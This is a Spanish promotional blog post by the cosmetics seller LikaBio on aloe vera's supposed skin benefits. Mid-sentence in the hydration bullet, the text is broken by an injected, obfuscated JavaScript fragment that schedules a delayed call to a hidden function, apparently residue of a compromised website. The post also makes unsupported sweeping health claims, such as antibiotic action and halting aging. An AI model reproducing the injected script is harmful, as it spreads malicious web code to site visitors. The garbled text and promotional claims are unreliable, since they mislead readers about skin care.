Categorí­a Blog

¿Qué propiedades tiene el aloe vera para nuestra piel?

Las propiedades del Aloe Vera en la piel

El aloe vera, también conocida como sábila, es una planta con multitud de propiedades para nuestra salud. En este artículo te vamos a mostrar las peculiaridades y asombrosos efectos que este recurso natural puede tener en tu piel. En LikaBio somos especialistas en el cuidado de la piel y por ello conocemos los remedios naturales más efectivos para que tu piel luzca saludable y bella. No olvides visitar nuestra página web e informarte de todos los cosméticos naturales que te ofrecemos.

 

Propiedades del aloe vera en nuestra piel

  •  Capacidad de regeneración. El aloe vera posee una gran fama como regenerador de nuestra piel. La alantoína es uno de los componentes químicos de esta planta que favorece ese fantástico y sorprendente efecto reparador. Es por ello, que las sustancias derivadas del aloe vera regeneran y restauran los tejidos dañados y favorece la producción de células nuevas al mismo tiempo que elimina aquellas que ya se encuentran dañadas. Es un remedio perfecto para irritaciones y quemaduras leves.
  • Nutrición e hidratación. Además de su poder restaurador en Likabio somos muy conscientes de la importancia de esta planta en los cosméticos naturales por su elevado efecto nutritivo e hidratante cuandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando lo utilizamos en el cuidado de nuestra piel. Entre su composición posee multitud de vitaminas, aminoácidos, mucílagos, polisacáridos y demás componentes que ayudan a que penetre hasta las capas más profundas de la dermis y llegue a hidratar y nutrir de manera intensa la piel.
  • Su elevado efecto como antioxidante frena el envejecimiento de la piel ya que favorece la formación de colágeno, de elastina y frena la acción de los radicales libres.
  • Acción bactericida. Además de cuidar el aspecto de nuestra piel, el aloe vera también la protege de peligros y asegura su salud. Este fenómeno es debido a una sustancia llamada antraquinona que otorga a la planta sorprendentes propiedades naturales antibióticas y antifungicidas.

 

En este artículo te hemos presentado brevemente algunas de las propiedades de esta planta, cuyos productos son aptos para todos los públicos. No olvides utilizar sus beneficiosas propiedades a la hora de proteger y cuidar tu piel. Si quieres conocer otras plantas con excelentes propiedades cosméticas descubre nuestros productos LikaBio y disfruta de una piel joven, hermosa y saludable.